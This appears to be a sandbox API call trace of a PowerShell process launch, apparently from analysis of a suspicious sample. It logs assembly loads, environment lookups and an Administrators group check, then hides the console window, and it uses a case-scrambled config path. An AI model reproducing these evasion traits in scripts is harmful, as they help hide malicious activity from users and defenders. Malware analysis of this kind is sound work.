[0075.590] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0075.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0075.590] CoTaskMemFree (pv=0x2c78a0)
[0075.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", nBufferLength=0x105, lpBuffer=0xcd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", lpFilePart=0x0) returned 0x3c
[0075.704] SetErrorMode (uMode=0x1) returned 0x1
[0075.704] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xcd680 | out: lpFileInformation=0xcd680*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0075.704] SetErrorMode (uMode=0x1) returned 0x1
[0076.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.734] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0076.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.734] CoTaskMemFree (pv=0x2c78a0)
[0076.756] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0076.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.756] CoTaskMemFree (pv=0x2c78a0)
[0076.756] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0076.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.757] CoTaskMemFree (pv=0x2c78a0)
[0076.771] CoCreateGuid (in: pguid=0xcda48 | out: pguid=0xcda48*(Data1=0xb9bf3d29, Data2=0x7685, Data3=0x4d94, Data4=([0]=0x8c, [1]=0x2a, [2]=0x9a, [3]=0x7b, [4]=0xea, [5]=0xf6, [6]=0xc5, [7]=0x27))) returned 0x0
[0076.794] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0076.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.794] CoTaskMemFree (pv=0x2c78a0)
[0076.796] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0076.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.796] CoTaskMemFree (pv=0x2c78a0)
[0076.811] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0076.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.812] CoTaskMemFree (pv=0x2c78a0)
[0076.815] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
[0076.816] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd6f0 | out: lpConsoleScreenBufferInfo=0xcd6f0) returned 1
[0076.820] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
[0076.820] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd6f0 | out: lpConsoleScreenBufferInfo=0xcd6f0) returned 1
[0076.821] GetVersionExW (in: lpVersionInformation=0xcd680*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd680*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0076.822] GetCurrentProcess () returned 0xffffffffffffffff
[0076.823] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd718 | out: TokenHandle=0xcd718*=0x31c) returned 1
[0076.825] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd638 | out: TokenInformation=0x0, ReturnLength=0xcd638) returned 0
[0076.826] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d4600
[0076.826] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2d4600, TokenInformationLength=0x4, ReturnLength=0xcd638 | out: TokenInformation=0x2d4600, ReturnLength=0xcd638) returned 1
[0076.826] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd798 | out: phNewToken=0xcd798*=0x318) returned 1
[0076.826] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd638 | out: TokenInformation=0x0, ReturnLength=0xcd638) returned 0
[0076.826] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d4630
[0076.826] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x2d4630, TokenInformationLength=0x4, ReturnLength=0xcd638 | out: TokenInformation=0x2d4630, ReturnLength=0xcd638) returned 1
[0076.826] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2cde520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd7a8 | out: IsMember=0xcd7a8) returned 1
[0076.827] CloseHandle (hObject=0x318) returned 1
[0076.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0077.001] SetConsoleCtrlHandler (HandlerRoutine=0x2b5677c, Add=1) returned 1
[0077.029] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.029] CoTaskMemFree (pv=0x2c78a0)
[0077.030] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.030] CoTaskMemFree (pv=0x2c78a0)
[0077.358] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.358] CoTaskMemFree (pv=0x2c78a0)
[0077.375] GetConsoleWindow () returned 0x10238
[0077.376] ShowWindow (hWnd=0x10238, nCmdShow=0) returned 0
[0077.397] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
[0077.400] CoCreateGuid (in: pguid=0xcd890 | out: pguid=0xcd890*(Data1=0xa4ce8319, Data2=0xe164, Data3=0x4e4f, Data4=([0]=0xaa, [1]=0xb, [2]=0x70, [3]=0x28, [4]=0xaf, [5]=0xfd, [6]=0xfe, [7]=0x51))) returned 0x0
[0077.408] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.408] CoTaskMemFree (pv=0x2c78a0)
[0077.434] WinSqmIsOptedIn () returned 0x0
[0077.435] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.435] CoTaskMemFree (pv=0x2c78a0)
[0077.444] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.444] CoTaskMemFree (pv=0x2c78a0)
[0077.445] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.445] CoTaskMemFree (pv=0x2c78a0)
[0077.450] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.450] CoTaskMemFree (pv=0x2c78a0)
[0077.454] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.454] CoTaskMemFree (pv=0x2c78a0)
[0077.464] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.464] CoTaskMemFree (pv=0x2c78a0)
[0077.464] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.464] CoTaskMemFree (pv=0x2c78a0)
[0077.470] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.470] CoTaskMemFree (pv=0x2c78a0)
[0077.471] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.471] CoTaskMemFree (pv=0x2c78a0)
[0077.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.608] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0077.608] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
[0077.608] CoTaskMemFree (pv=0x2c78a0)
[0077.609] CoTaskMemAlloc (cb=0xcc) returned 0x364160
[0077.609] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x364160, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.609] CoTaskMemFree (pv=0x364160)
